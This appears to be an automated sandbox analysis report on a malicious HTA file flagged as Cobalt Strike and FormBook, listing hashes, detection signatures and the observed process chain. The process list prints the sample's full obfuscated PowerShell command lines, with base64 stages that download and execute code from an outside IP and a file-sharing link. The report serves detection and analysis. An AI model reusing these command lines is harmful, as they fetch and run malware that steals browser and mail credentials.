Edit tour
Windows
Analysis Report
creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta
Overview
General Information
| Sample name: | creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta |
| Analysis ID: | 1562942 |
| MD5: | d01d29748ab5d89b8400eca9d5404261 |
| SHA1: | bf9ea4804980dfec867d360ccff43ac7aaab8eb8 |
| SHA256: | b246a7077befaaa252210036012149efa84584bd76ba564f875f5cb227ee78d8 |
| Tags: | htauser-abuse_ch |
| Infos: |   |
 | |
Detection
Cobalt Strike, FormBook, HTMLPhisher
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
PowerShell case anomaly found
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 7544 cmdline: mshta.exe "C:\Users\ user\Deskt op\creamym ilkburnwti thsweethea rtshegiven mebesttert hingswhich newandshin eforme.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 7648 cmdline: "C:\Window s\SYsTem32 \windOwsPo WeRshELl\v 1.0\Powers hELl.ExE" "PoWerSheL L.eXE -EX BypasS -noP -w 1 -C DEviceCr EDENTIALDE PLoYMEnt.E Xe ; ieX ($(iEX('[s ySteM.TEXT .EnCOdIng] '+[CHAR]58 +[chAR]0X3 a+'UTF8.Ge tsTriNg([s ysTem.ConV ert]'+[CHa R]0X3A+[CH Ar]0x3A+'f RombasE64s TRiNG('+[C hAR]0X22+' JGVZYlFRYl RxICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgYWRkLX R5UEUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1lbUJlcm RFZklOaXRp T24gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgJ1 tEbGxJbXBv cnQoInVSbE 1vbi5kbGwi LCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBDaG FyU2V0ID0g Q2hhclNldC 5Vbmljb2Rl KV1wdWJsaW Mgc3RhdGlj IGV4dGVybi BJbnRQdHIg VVJMRG93bm xvYWRUb0Zp bGUoSW50UH RyICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgIGRL Yk1uT2lGLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBqLHN0cm luZyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICB5 ZkVqSG9vTH UsdWludCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBGeXNTUV RxLEludFB0 ciAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBBZ0 4pOycgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LU5BTWUgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgImduS3dX QyIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 5BTWVTcEFD RSAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBvWl YgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgLVBh c3NUaHJ1Oy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAkZVli UVFiVHE6Ol VSTERvd25s b2FkVG9GaW xlKDAsImh0 dHA6Ly8xND YuNzAuMTU1 LjI1NC8xMT UwL2NyZWF0 ZWFiZXR0ZX JidXR0ZXJz bW9vdGhzbW 9vdGh5a2lu Z3N0b2dldG 1lc3dlZWV0 bmVzcy50SU YiLCIkRW52 OkFQUERBVE FcY3JlYXRl YWJldHRlcm J1dHRlcnNt b290aHNtb2 90aHlraW5n c3RvZ2V0bW Vzdy52QnMi LDAsMCk7c3 RBclQtU0xF RXAoMyk7aW V4ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICIk ZW52OkFQUE RBVEFcY3Jl YXRlYWJldH RlcmJ1dHRl cnNtb290aH Ntb290aHlr aW5nc3RvZ2 V0bWVzdy52 QnMi'+[chA r]34+'))') ))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 7656 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7772 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EX BypasS -noP -w 1 -C DEvice CrEDENTIAL DEPLoYMEnt .EXe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
csc.exe (PID: 7924 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\uzumsuzj \uzumsuzj. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 7940 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SA57E.tmp" "c:\Users \user\AppD ata\Local\ Temp\uzums uzj\CSC9B0 A3672FBDD4 8D4844B884 E3D96D699. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) 
wscript.exe (PID: 8044 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\creat eabetterbu ttersmooth smoothykin gstogetmes w.vBs" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 8096 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnT0pQaW 1hZ2VVcmwg PSBHZEhodH RwczovLzMx MDUuZmlsZW 1haWwuY29t L2FwaS9maW xlL2dldD9m aWxlaycrJ2 V5PXNoVFBI YkNQWDhvLW xPdENxSExH Nl8weEN5LX hsNCcrJ3Ru eGxBJysnVm JROTUtZHZp VEs1Y0FSYU 5kUWpiYjNt ZXhmd1F6S2 1UWGcmc2tp cHJlZz10cn VlJnBrX3Zp ZD1lMDEwOT YzOGMnKyc5 YmZiOTU3MT czMjUzMTMw OWI1ZmY3Yy BHJysnZEg7 T0pQd2ViQ2 xpZW50ID0g TmV3LU9iam VjdCBTeXN0 ZW0uTmV0Jy snLldlYkNs aWVudDtPSi crJ1BpbWEn KydnZUJ5dG VzID0gT0pQ d2ViQ2xpZW 50LkRvd25s b2FkRGF0YS hPSlBpbWFn ZVVybCk7T0 pQaW1hZ2VU ZXh0ID0gW1 N5c3RlbS5U ZXh0LkVuYy crJ29kaW4n KydnXTo6VV RGOC5HZXRT dHJpbmcoT0 pQaW1hZ2VC eXRlcyk7T0 pQc3RhcnRG bGFnID0gR2 RIPDxCQVNF NjRfU1RBUl Q+PkdkSDtP JysnSlBlbm RGbGFnID0g R2RIPDxCQV NFNjRfRU5E Pj5HZEg7T0 pQc3RhcnRJ bmRleCA9IE 9KUGltYWdl VGV4dC5Jbi crJ2RleE9m KE9KUHN0YX J0RmxhZyk7 T0pQZW5kSW 5kZXggPSBP SlBpbWFnZV RleHQuSW4n KydkZXhPZi hPSlBlbmRG bGFnKTtPSl BzdGFydElu ZGV4IC1nZS AwIC1hbmQg T0pQZW5kSW 5kZXggLWd0 JysnIE9KUH N0YXJ0SW5k ZXg7T0pQc3 RhcnRJbmRl eCArPSBPSl BzdGFydEZs YWcuTGVuZ3 RoO09KUGJh c2U2NExlbm d0aCA9IE9K UGVuZEluZG V4IC0gT0pQ cycrJ3Rhcn RJbmRleDtP SlBiYXNlNj RDb21tYW5k ID0gJysnT0 pQaW1hZ2VU ZXh0LlN1Yn N0cmluZyhP SlBzdGFydE luZGV4LCBP SlBiYXNlNj RMZW5ndGgp JysnO09KUG Jhc2U2NFJl dmVyc2VkID 0gLWpvJysn aW4gKE9KUG Jhc2U2NENv bW1hbmQuVG 9DaGFyQXJy YXkoKSByZV IgRm9yRWFj aC1PYmplY3 QgeyBPSlBf IH0pWy0xLi 4tKE9KUGJh c2U2NENvbW 1hbmQuTGVu Z3RoKV07T0 pQY29tbWFu ZEJ5dGVzID 0gW1N5c3Rl bS5Db252ZX J0XTo6RnJv bUJhc2U2NF N0cmluZyhP SlBiYXNlNj RSZXZlcnNl ZCk7T0pQbG 9hZGVkQXNz ZW1ibHkgPS BbU3lzdGVt LlJlZmxlY3 Rpb24uQXNz ZW1ibHldOj pMb2FkKE9K UGNvbW0nKy dhbmRCeXRl cyk7T0pQdm FpTWV0aG9k ID0gW2RubG liLklPLkhv bWVdLkdldE 1ldGhvZChH ZEhWJysnQU lHZEgpO09K UHZhaU1lJy sndGhvZC5J bnZva2UoT0 pQbnVsbCwg QChHZEh0eH QuQU1NUkMv MDUxMS80NT IuNTUnKycx LjA3LjY0MS 8vOnB0dGhH JysnZEgsIC crJ0dkSGRl c2F0aScrJ3 ZhZG9HZEgs IEdkSGRlc2 F0aXZhZG9H ZEgsIEdkSG Rlc2F0aXZh ZG9HZEgsIE dkSGFzcG5l dF9jb21waW xlckdkSCwg R2RIZGVzYX RpdmFkb0dk SCwgR2RIZG VzYXRpdmFk b0dkSCxHZE hkZXNhdGl2 YWRvR2RILE dkSGRlc2F0 aXZhZG9HZE gsR2RIZGVz YXRpJysndm Fkb0dkSCwn KydHZEhkZX NhdGl2YWRv R2RILEdkSG Rlc2F0aXZh ZG9HZEgsR2 RIMUdkSCxH ZEhkZXNhdG l2YWRvR2RI KSk7JyktY1 JlcGxhQ2Ug IChbQ0hhUl 03MStbQ0hh Ul0xMDArW0 NIYVJdNzIp LFtDSGFSXT M5LWNSZXBs YUNlIChbQ0 hhUl0xMTQr W0NIYVJdMT AxK1tDSGFS XTgyKSxbQ0 hhUl0xMjQg LWNSZXBsYU NlIChbQ0hh Ul03OStbQ0 hhUl03NCtb Q0hhUl04MC ksW0NIYVJd MzYpfC4gKC Akc2hlbGxp RFsxXSskU0 hFTGxpZFsx M10rJ3gnKQ ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: